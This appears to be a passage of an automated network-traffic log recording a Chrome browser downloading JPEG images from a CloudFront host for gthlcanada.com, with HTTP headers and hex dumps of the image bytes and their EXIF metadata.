                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: cc 81 87 a7 a5 79 8c b8 9e 39 b8 4b b4 6f 8c 94 92 68 70 6a b6 48 0a 40 14 d0 00 13 48 02 31 da a0 c6 21 9f b4 15 01 30 2f 8f d8 1a 94 ba 21 1e c8 d6 61 91 55 a2 72 15 46 da 99 12 93 c5 97 fa ae bd ae ff 00 45 b4 5b 96 b4 64 b7 ef ee 6e 03 15 28 1b 65 c6 37 3b ef 8a b2 09 45 6f 61 fa 15 fb 5d 1b 8e 78 0f 4f 9f 54 b8 d5 4e aa 2d e4 0e d0 73 17 67 8f 23 98 ee 77 f7 7c 3c 3c ea c7 3c 79 1d 55 07 28 d6 ac 6f a1 d4 2c a0 bb 81 b9 a2 9e 35 91 4f 98 23 35 95 aa 74 48 71 cd 40 1d 9a 40 01 34 50 19 8f 1e f1 0f 10 6a 3c 41 fa 87 87 0b 01 6f 10 92 77 47 2b 96 27 60 48 df 03 c8 79 d6 8c 30 8a 5b a4 1f cc 83 9a f3 8c 38 25 f4 dd 4b 50 d5 65 bc b5 76 55 98 31 2c b8 3b 95 c1 19 f9 f5 a9 d4 27 c5 12 8b 4f 83 63 b5 b9 4b bb 68 ae 23 39 49 50 3a 9f 30 46 6b 1b 54 e8 88 b6
                                                                                                                          Data Ascii: y9KohpjH@H1!0/!aUrFE[dn(e7;Eoa]xOTN-sg#w|<<<yU(o,5O#5tHq@@4Pj<AowG+'`Hy0[8%KPevU1,;'OcKh#9IP:0FkT
                                                                                                                          2025-01-13 21:01:22 UTC4172INData Raw: 12 78 ff 00 65 90 f2 9c 7c ea 68 be 18 e3 25 c4 a8 47 4c d4 55 04 c6 0b 79 22 c9 f7 8c 87 24 fc f3 43 64 66 b6 71 66 7b da b7 68 b7 1a 03 db 59 da f7 46 e6 6c bb 86 19 e5 4f 0f ae ff 00 4a 6b 1e ee 4c 59 f2 d7 06 4f ae f1 be b1 c4 65 56 fa e9 e4 8d 4e 55 06 ca 3e 54 d6 2d bd 19 54 8a f4 ac 4c ac 7c ea d8 a2 32 1c 58 dc 98 f2 32 68 68 94 65 46 d7 d9 67 68 f3 cf 67 ec 57 d2 1b 81 00 c1 07 ef aa f9 83 e3 f0 ac d3 5b 5f e8 74 30 b5 35 c7 64 37 6a fa 9d a3 6a 16 f6 d6 8e 1d 9d bb e7 23 a6 3c 28 87 2e d0 67 e1 53 28 4f a9 49 3d c7 b3 b3 65 79 72 bb 74 a9 d1 8e f9 3d 0f c3 f7 76 9a 97 67 fa 55 ec 31 c4 e6 cd a2 8a 56 53 ef 23 74 20 8a 93 8b 71 b3 44 66 b8 45 ee da 58 45 a0 7c 80 a0 55 68 bd 10 32 cf ca 92 48 fd ef 7a d2 06 55 0b ee d0 d7 16 4f 72 e8 9d 9c db fb
                                                                                                                          Data Ascii: xe|h%GLUy"$Cdfqf{hYFlOJkLYOeVNU>T-TL|2X2hheFghgW[_t05d7jj#<(.gS(OI=eyrt=vgU1VS#t qDfEXE|Uh2HzUOr
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 3d d4 7a 06 6d 2e f7 4e bc 4b fd 2d 95 95 c7 bf 03 1c 03 f0 3e 15 3d a5 89 fc 8e a5 d4 f8 89 18 4a da 04 9d de 36 6e fa 3c ff 00 b5 56 57 02 dd c9 07 aa db 5e c9 a6 5f ea fa bb 2a aa 44 ed 1d ba 1c 81 80 77 27 c4 d6 57 16 c9 b7 c1 59 e0 4e 10 9b 50 b8 b7 bd 9e 28 e3 b5 42 24 01 87 df db c0 7f 1a cf 08 ca f9 39 99 72 a6 a9 1a bc 28 20 1d d8 18 51 d3 e1 5a a3 c1 98 70 24 04 54 c0 e3 40 ec a4 f6 a0 fd dd 85 83 f4 ff 00 28 23 3f e1 35 bf 41 f9 b2 ec 12 a7 66 29 ab da 77 ba bb 32 6c 09 56 ae 8e 4c 36 c9 4e 7c 9e 99 d1 2e 7d ab 47 b1 9f 39 ef 60 47 3f 12 a0 d7 02 51 a9 34 50 99 99 76 85 a7 1d 17 8a 2c b5 1b 29 19 27 ba 2c 19 4f dc 7f 4a cd 92 34 ff 00 99 d0 d2 64 77 43 ab 1d 55 b5 47 59 62 95 ed af a1 f7 5d 43 15 6f f7 8a 51 9b 8f 28 eb c2 4b a9 2f ea 4c 6b 52
                                                                                                                          Data Ascii: =zm.NK->=J6n<VW^_*Dw'WYNP(B$9r( QZp$T@(#?5Af)w2lVL6N|.}G9`G?Q4Pv,)',OJ4dwCUGYb]CoQ(K/LkR
                                                                                                                          2025-01-13 21:01:22 UTC2048INData Raw: 96 8a 41 ce a3 d5 7a d4 72 69 d2 5b a2 ed 12 86 a2 dd 49 53 13 d2 b5 38 ef a7 8d 3d b1 a1 2d b0 23 1b d6 7d b4 6a 53 fd 4b 15 d5 96 a1 6c c8 b1 dd ab c2 db 17 23 75 ab 71 e3 8c bc 90 c9 9e 50 f0 58 34 7d 51 78 62 06 9a cc ea 17 86 42 0c fd e4 45 11 87 96 0f 4f 8d 6e c7 2c 50 55 66 1c 98 b3 65 76 d0 db 53 ed 5f 4b 91 91 74 bb 8b 99 90 8f 7e 16 b5 67 e4 3e 8c 2a 7e b4 57 65 0b 0c df 80 9a 77 6a d0 99 61 b4 7b 1d 46 45 91 f9 79 22 80 29 76 f0 dc 9d a9 7a d1 7c a0 78 26 9f 23 3d 7f 8a 6e 35 ad 47 d9 e6 d3 4d 99 b5 72 62 49 66 4c 63 18 f0 3b b7 ad 66 cf 9a 32 8d 23 a1 a5 c3 28 4b 91 4d 46 cd 20 b2 8d ae 66 ee d5 bd f7 68 e4 20 00 07 42 45 63 6e 8e 84 5d df c2 30 2e 21 bb 4b dd 7a ee 78 a5 69 62 e7 c2 3b 31 24 81 b7 53 5b 71 26 a2 ac e0 6a 64 a5 91 b5 d0 cb bd
                                                                                                                          Data Ascii: Azri[IS8=-#}jSKl#uqPX4}QxbBEOn,PUfevS_Kt~g>*~Wewja{FEy")vz|x&#=n5GMrbIfLc;f2#(KMF fh BEcn]0.!Kzxib;1$S[q&jd
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 0a 4c bc b9 f1 a4 01 a3 9c 83 9a 00 b2 f0 a7 09 cf c5 97 5c aa 7b ab 74 fe b2 5c 7e 03 d6 ab 9c f6 a3 46 0c 2f 23 fd 0d 3d 38 23 43 d1 ad 8c 51 86 8a 39 53 92 47 2c 4f 37 ab 78 1a cc b5 19 22 f8 67 5a 3a 3c 32 8d 6d 29 3a bf 67 9a a6 9d 23 4d a5 98 af 62 27 2b cb b3 62 ad 8e a1 3e cc d9 3e 9b 25 cc 39 2a c6 e6 ee 27 6b 6b 85 e4 28 4a b0 39 d8 f8 e6 af 4d 76 60 69 c5 ed 65 bf 83 78 52 d3 53 88 ea 3a 8d c0 82 c6 36 de 21 b1 97 1e be 02 a8 c9 96 9e d4 6e d3 e9 d4 96 e9 74 5d 2e 74 1d 07 5a d3 65 8e 1b 1b 61 03 2f ba c8 80 11 ea 0e 2b 36 e9 27 66 d9 63 84 a3 54 62 5a e5 ab 68 7a 84 d6 52 0c b4 6d b1 f3 1e 06 b7 c6 49 ab 38 59 20 e1 27 16 43 4d 39 90 f3 1d 85 32 02 03 9a 53 8f 0a 00 5a 09 30 79 4f 85 00 59 74 2e 0c d7 f8 96 de 5b 8d 27 4a b8 ba 86 1f be ea 00
                                                                                                                          Data Ascii: L\{t\~F/#=8#CQ9SG,O7x"gZ:<2m):g#Mb'+b>>%9*'kk(J9Mv`iexRS:6!nt].tZea/+6'fcTbZhzRmI8Y 'CM92SZ0yOYt.['J
                                                                                                                          2025-01-13 21:01:22 UTC2800INData Raw: a8 dc 00 46 2b cc ea 30 46 53 69 be 8e 96 36 ea c7 83 5c d7 89 fe bb 4e ff 00 e8 bf fe 6a a7 ed 61 f2 59 bd 8b 2e ab c4 0c 32 b7 1a 78 ff 00 ab 6f e7 47 da 43 e4 4e 6c 46 e6 ef 88 e6 47 8e 6b 8b 09 23 65 e5 64 29 b1 1e 44 10 69 ad 34 53 b4 c8 ee 65 69 ef ae 6c 88 b1 b9 82 da e1 01 ca 17 91 89 8f d0 1c 74 f4 ad 10 8b 8b b4 c1 d1 70 d2 e6 cc 0b e1 b7 85 5a 9a 13 24 39 c5 2d c4 4f 1e 2c d2 20 ca c8 76 f5 ae c3 8a 28 52 63 88 f5 2b 95 df 9b 35 17 8a 23 de c7 d6 9c 49 7b 68 73 1c 92 c7 ea 8e 45 41 e2 44 94 ef b2 4a 0e 38 bd 8c 05 79 e5 61 e2 1b de 15 5b c0 3d e8 7f 69 c6 91 2b 65 a1 81 b3 d7 03 97 f2 c5 54 f0 32 4a 48 98 b7 e3 5b 72 b8 cc 91 79 04 9b 3f ed 03 50 78 be 51 24 43 76 87 ae c7 aa 68 96 d0 c5 23 b7 db 73 30 60 3c 01 f1 18 fc ab 46 92 0a 32 6c a7 3f
                                                                                                                          Data Ascii: F+0FSi6\NjaY.2xoGCNlFGk#ed)Di4SeiltpZ$9-O, v(Rc+5#I{hsEADJ8ya[=i+eT2JH[ry?PxQ$Cvh#s0`<F2l?


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          134192.168.11.204996454.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC648OUTGET /app/uploads/gthl/2024/12/05143829/0C9A4640-730x487.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:22 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 127407
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Thu, 05 Dec 2024 19:38:31 GMT
                                                                                                                          ETag: "1115a9af4937c1e49a63fa04e5d3525e"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 09028890675e48687e2855f3bdad98ea.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: 9SJHBhSp7POd8Qq9Q_DYGp306n7DIqDVFhq_aH4O6ZeLLx03tvQn7g==
                                                                                                                          2025-01-13 21:01:22 UTC15896INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 f0 00 f0 00 00 ff e1 57 94 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0a 00 0f 01 02 00 06 00 00 00 86 00 00 00 10 01 02 00 15 00 00 00 8c 00 00 00 1a 01 05 00 01 00 00 00 a2 00 00 00 1b 01 05 00 01 00 00 00 aa 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 20 00 00 00 b2 00 00 00 32 01 02 00 14 00 00 00 d2 00 00 00 3b 01 02 00 08 00 00 00 e6 00 00 00 98 82 02 00 09 00 00 00 ee 00 00 00 69 87 04 00 01 00 00 00 f8 00 00 00 64 03 00 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 56 00 00 f0 00 00 00 01 00 00 00 f0 00 00 00 01 00 00 00 41 64 6f 62 65 20 4c 69 67 68 74 72 6f 6f 6d 20 38 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 31 32 3a 30 34 20 30 30 3a 34
                                                                                                                          Data Ascii: JFIFWExifII*(1 2;idCanonCanon EOS 5D Mark IVAdobe Lightroom 8.0 (Macintosh)2024:12:04 00:4
                                                                                                                          2025-01-13 21:01:22 UTC94INData Raw: b0 b6 6a 85 52 64 a6 c3 6c 8c 45 9a 09 11 24 5b 3b d3 34 cb b8 34 17 91 ee 10 07 42 d1 71 fb fa 9c e8 b0 c7 86 00 3a e9 d1 93 02 d5 b4 6f 30 dd da da ea e6 76 7b 4b 7b 95 f5 4e d5 e3 ca 9b 11 e1 83 39 b8 17 27 4f 18 c2 63 bd eb 1a 74 c2 5d 31 01 06 45 64 e2 c0 75 3b 53 21 88 dc 5c
                                                                                                                          Data Ascii: jRdlE$[;44Bq:o0v{K{N9'Oct]1Edu;S!\
                                                                                                                          2025-01-13 21:01:22 UTC1020INData Raw: 6c e2 a6 5e 31 e6 2f f9 c7 c5 bd d5 e7 be d3 ef 9e 18 6e 58 bb 42 11 96 8c 4d 49 dd 5b ed 75 6a 7e d6 6d 34 dd b1 9f 0e 31 8c 46 19 44 3e 89 4e 52 8c b8 3f 86 3e 98 cb 8b 83 e9 e2 fe 6b 8d 93 04 26 78 ae 51 27 f9 bc 29 ef 90 ff 00 24 74 ff 00 2f 5f 8d 42 fa 66 ba 91 45 23 8d 80 0a 3c 77 65 88 0e 5f b5 f6 bf e0 79 f2 af 59 da 59 b5 20 09 f0 c6 03 d5 c1 0e 2f 5c bf 87 8e 53 fe 67 f3 7f 9c 9c 58 61 8f e9 bb fe 95 7f bd 7a cc 7c 0c 6a 52 9c 18 54 50 d4 7d e3 ae 61 b2 5e 7a 62 ab 48 c5 5f 33 7f ce 64 d8 51 fc ab a9 76 02 ee d5 be 6d e9 c8 bf f1 06 c0 52 c3 bf 2e 7f 39 ac fc 9d e4 7d 3f 48 16 bf 5e 32 c9 75 2d ec 6a e1 1a 32 d3 56 31 c5 c7 09 39 a1 af da f8 73 55 da 1d 8f 93 3c 86 5c 39 4e 9b 20 fa bf 9b 97 fa fb ff 00 07 f5 5c 9c 1a 91 0f 4c 87 1c 7f dc bd 3b
                                                                                                                          Data Ascii: l^1/nXBMI[uj~m41FD>NR?>k&xQ')$t/_BfE#<we_yYY /\SgXaz|jRTP}a^zbH_3dQvmR.9}?H^2u-j2V19sU<\9N \L;
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: a9 60 a7 87 11 b6 d9 be 8c 76 b2 e9 a4 40 3b 24 de 68 d2 7c e9 69 71 63 6b 62 d1 da 79 6a 29 16 4b a8 4b 56 47 3e 1d 3e cd 7e 2c 19 78 46 23 de d9 86 44 e4 05 e8 56 71 4b 73 a0 4d 6d 14 e2 19 e5 89 95 25 1f b2 48 a5 73 13 11 da 93 a8 1e ab 43 da e9 d7 cb a5 45 6d 72 88 1a de 52 91 ac 61 ca f0 a5 6a 38 32 9d f6 df f9 ff 00 67 2c ad 9a 2d 11 04 14 71 2c f6 fe ae f4 21 a3 0b 55 07 61 fb d7 2d 8a a7 c8 62 f4 d7 d2 00 46 05 15 56 80 0a 76 db 26 18 ae ae 15 4b 35 bf 32 68 1a 1d b1 b9 d6 75 1b 7d 3e 01 d5 ee 24 58 fe e0 4d 4f d1 96 e1 c1 3c 86 a1 13 33 fd 14 12 07 37 cb 1f f3 93 9f 99 5e 5f f3 74 3a 3d 9e 83 2b 5c 5a e9 f3 cb 24 d7 2c 8d 18 77 74 e2 a2 30 e0 33 28 00 d5 b8 ff 00 2f 1c ca d5 76 66 5c 18 c4 e6 2a e5 c3 c3 ff 00 14 c2 19 a3 23 41 e0 27 ad 73 5c da
                                                                                                                          Data Ascii: `v@;$h|iqckbyj)KKVG>>~,xF#DVqKsMm%HsCEmrRaj82g,-q,!Ua-bFVv&K52hu}>$XMO<37^_t:=+\Z$,wt03(/vf\*#A's\
                                                                                                                          2025-01-13 21:01:22 UTC1024INData Raw: 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii:
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii:
                                                                                                                          2025-01-13 21:01:22 UTC1024INData Raw: d4 e3 cc ef 42 93 8c 67 c4 32 7e 94 63 00 5a e3 b9 22 0d ac aa 4c b8 ee 84 9d 8b 51 65 b4 8c 67 c2 00 0a 04 f1 cf ba 9e 05 91 af 6d 48 5a d4 e2 e3 3b 1d 08 09 28 52 80 51 07 c8 0e 41 fa 54 58 20 4e ee 00 5a 7b 82 b8 fb 49 52 77 05 0d c3 d4 1c 81 c7 fe c5 1d 89 32 e3 a6 2e f2 98 69 a8 eb 7d 2f b6 90 52 c1 5f 25 27 a8 04 f9 f3 c7 9d 4e 32 20 cd 36 c7 75 6a e9 08 3e 82 46 38 56 ea b4 45 6b 56 30 89 12 8c e6 90 a1 b7 ee 56 b1 d1 5c 64 7f 3a 4c 8c 97 a9 e7 7d 6b 76 ba 31 a8 1f 43 32 54 94 0e 80 50 43 08 88 4d ea f0 47 fb 51 a4 30 b8 f7 5b aa c7 32 09 34 c8 0e a6 e3 76 49 c9 7d 58 a8 8f 82 63 4f 5c e7 bf 78 88 db cf 15 25 4b 00 8a 78 11 b9 98 68 30 d1 81 ce 29 96 48 86 b8 69 f9 f7 25 f7 50 02 77 7a a8 e0 0a 69 64 81 f4 6e cd 6f ea fe b6 64 56 c7 c4 9f e5 46 d2
                                                                                                                          Data Ascii: Bg2~cZ"LQegmHZ;(RQATX NZ{IRw2.i}/R_%'N2 6uj>F8VEkV0V\d:L}kv1C2TPCMGQ0[24vI}XcO\x%Kxh0)Hi%PwzidnodVF
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: 05 68 f0 6d c7 bc 73 9a b5 32 a6 83 1f 8e 90 c1 dc 43 60 72 02 9d ce e0 4e 71 d3 df ee aa a5 cb 26 a3 c0 f5 be 23 72 f0 1c 47 b4 3c f0 28 46 e5 6d da 77 15 71 8f 5e 9c d4 2e 9b 6b 6c 44 ab c7 2c de 7b 12 d2 70 e0 40 73 51 38 5f 91 2d e5 11 1f 72 77 90 d7 91 03 d4 9e 73 e9 8a d5 5c 36 47 05 3f 33 35 29 13 63 c6 5b 4a 79 a5 a9 69 cf 0a 49 18 cf ad 4f 0a 41 b9 c7 b0 ea 1e 17 2b 7b aa 6e 22 5f 6f 6a bb b6 9e f3 c0 fe 7d 28 92 e3 80 83 e5 64 ca de d6 d6 ab 24 b7 9c 55 ad 10 5e 4a b0 e0 2d f2 39 c7 1f fd ab 89 29 34 de 17 27 a4 8c 7e 14 b7 65 11 7a ba fb 70 bc 6a c3 16 23 a9 6f b8 b6 21 d6 4a bc 39 df 92 b5 27 8f c5 80 91 eb 5d 6a e5 e5 c1 70 70 ec 5e 64 df 21 5a 21 77 49 d2 23 3a cd 82 44 08 0d ab bd 72 4c c3 85 3a a4 9c f8 47 2a 24 9e a4 9c 01 5a e5 77 18 4b
                                                                                                                          Data Ascii: hms2C`rNq&#rG<(Fmwq^.klD,{p@sQ8_-rws\6G?35)c[JyiIOA+{n"_oj}(d$U^J-9)4'~ezpj#o!J9']jpp^d!Z!wI#:DrL:G*$ZwK
                                                                                                                          2025-01-13 21:01:22 UTC16384INData Raw: e7 4d 8b 42 1a 07 8c 0a d9 5d 34 c3 e5 49 15 ca 52 f7 0b 43 e1 3c 03 c5 6e 8d f1 5c 14 4a 2e 41 49 94 95 23 18 ab 55 b1 7e a4 5c 18 f4 67 42 72 95 7e 13 53 53 42 50 68 e2 e1 a1 32 fb e6 94 0a 56 08 3c f9 d3 e3 b8 dc 5f a0 2a 20 ba e3 8e 04 b4 b5 14 f9 01 d6 a8 95 b0 8f cd 24 86 aa 93 ec 83 bf 65 dd 46 0b 50 25 38 8c 72 03 4a 3f ca b2 4f aa 69 61 de d8 fe a8 b1 69 ed 7f ca c1 a5 5a 65 ec dc 62 48 41 1d 42 9b 23 14 9e bf 4d 62 cc 2c 8b fc d1 25 a7 9c 7b c5 81 88 6f 13 80 cb 84 fa 04 9a a5 ea e8 5d e6 bf 54 1e 4c fd 82 1a b1 dc df 3f 73 6e 98 e7 f8 19 51 fe 55 9e 7d 5f 45 5f cf 74 57 fe e5 fe 49 ad 2d af f9 5f e8 1a d6 8b d4 6f 70 8b 0d d0 e7 ff 00 cb 2f fc ab 15 de 27 e9 30 f9 b5 30 ff 00 f2 45 d1 d0 6a 3d 20 cb 05 a6 e3 da 6e 82 61 4b 6c 5e 23 41 00 e0 ba
                                                                                                                          Data Ascii: MB]4IRC<n\J.AI#U~\gBr~SSBPh2V<_* $eFP%8rJ?OiaiZebHAB#Mb,%{o]TL?snQU}_E_tWI-_op/'00Ej= naKl^#A
                                                                                                                          2025-01-13 21:01:22 UTC630INData Raw: 97 e1 a6 be 6c 2f cc 8f ff 00 49 9a 8a 5b a9 6a 2b ba 44 c8 27 c1 1d 33 d4 b5 b8 7f 74 10 00 c9 a7 3e a4 a1 07 64 f4 d6 a8 ae ed c3 09 7d 44 a9 4d e1 4d 67 ee 5d f4 be aa 85 aa e3 2c a1 2b 62 6b 07 64 98 8e 8c 3a c2 bd 08 f3 1e 87 a1 ad f1 94 27 05 65 6f 31 7d 9a 2a 94 5a 78 64 d1 64 8e 86 82 27 30 a4 f5 a0 67 52 e2 93 40 0e 07 41 eb 40 1d ca 0f 95 00 7c 48 a0 04 11 93 40 0a 03 00 d0 02 4f 14 80 65 72 0f 44 7d 69 88 ac 5f ad cf cf be 43 71 4e 39 ec cd 36 54 b4 ee 3b 54 ac f1 c5 67 95 0e 57 2b 1b e1 2e df 52 d8 d9 88 38 fb 85 86 f3 95 13 8a d0 56 30 fb 20 83 e2 c9 f2 14 c0 cb bb 4b 8d 2c b0 b9 10 5a f6 87 62 f8 ca 7d 7d d4 26 97 32 24 93 7c 22 df d8 75 f1 fb bd 9e 4a 24 db d7 09 c6 94 06 d5 7e 6e 3a 8a 4e 50 7f 24 b2 12 8c a2 fe 24 69 24 64 2b 1d 71 41 13
                                                                                                                          Data Ascii: l/I[j+D'3t>d}DMMg],+bkd:'eo1}*Zxdd'0gR@A@|H@OerD}i_CqN96T;TgW+.R8V0 K,Zb}}&2$|"uJ$~n:NP$$i$d+qA


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          135192.168.11.204996654.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC452OUTGET /app/uploads/gthl/2020/04/09100946/82137226_2705410846193604_1955700155504132096_o-730x435.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC449INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 66915
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Thu, 09 Apr 2020 14:09:48 GMT
                                                                                                                          ETag: "db45c9184f115fab5f8c1916bb5a0fea"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 8d0bf2975485a7f0e4b8d82ddd378292.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: t5O6l9QNCOyOIabTbM21Ths5y3Q8HFTU6-xvx6C3nMlL3WPPBgzx5Q==
                                                                                                                          2025-01-13 21:01:21 UTC15935INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 18 79 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 03 c0 00 00 01 01 00 03 00 00 00 01 02 80 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1c 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d0 87 69 00 04 00 00 00 01 00 00 00 e4 00 00 01 1c 00 08 00 08 00 08 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 35 20 57 69 6e 64 6f 77 73 00 32 30 32 30 3a 30 34 3a 30 39 20 31 30 3a 31 36 3a
                                                                                                                          Data Ascii: JFIFHHyExifMM*(12iHHAdobe Photoshop CS5 Windows2020:04:09 10:16:
                                                                                                                          2025-01-13 21:01:21 UTC55INData Raw: de d7 b7 a2 26 cc 49 b8 b1 d7 9a 31 37 31 37 e6 77 dd 5d 26 f7 01 bd c7 86 e8 6f b1 f8 89 69 68 3a 6f 64 62 3b f7 09 bb 40 d3 e4 ae 89 93 6a 15 86 26 64 83 ae 3c ba
                                                                                                                          Data Ascii: &I1717w]&oih:odb;@j&d<
                                                                                                                          2025-01-13 21:01:21 UTC1039INData Raw: 2a b1 63 19 00 04 5a c1 19 99 37 7c f6 35 cd 69 23 88 58 db 98 56 18 b6 bd c1 49 53 25 25 4b a4 85 c5 af 02 c0 f9 85 d6 7c 3c b4 d7 59 b4 3c bd 56 5e 89 0b 48 6e c7 55 52 3c b6 da 5d 22 ca ec 75 ff 00 c5 7b 97 ae 9e 1f 99 e5 cf fd 7b 34 4c c2 fe 3c 76 b9 c3 5b ce ef cd 6d e6 a8 a2 d2 26 eb b0 5c ae fa 98 bf 53 9d 34 bf 8a c3 ac 0b 4e 83 e4 8a 7d 08 58 77 35 af b6 a8 68 e3 d4 03 a1 45 88 38 1d 14 6b a4 e0 38 79 22 c4 68 5b 6f b2 29 c0 ba 8d 17 06 f6 17 3d 11 08 12 02 ad 44 9b 50 6e 9b 4d 49 ef a1 53 fe 5a 98 9d 76 38 07 d1 37 0b 11 3f 27 b1 03 75 99 da cc c4 47 93 b6 e4 69 aa 77 22 f1 f2 91 b4 f3 3f e1 8a 43 7e 8d 29 a9 27 25 7f d9 95 06 15 88 4a 6d 1d 1d 43 bf d0 53 a2 64 fb 8c 75 ed 33 b5 84 19 53 1e 98 7b 98 74 dc 27 a8 4f a7 2c 4f 33 1c 33 a1 ec f7 32
                                                                                                                          Data Ascii: *cZ7|5i#XVIS%%K|<Y<V^HnUR<]"u{{4L<v[m&\S4N}Xw5hE8k8y"h[o)=DPnMISZv87?'uGiw"?C~)'%JmCSdu3S{t'O,O332
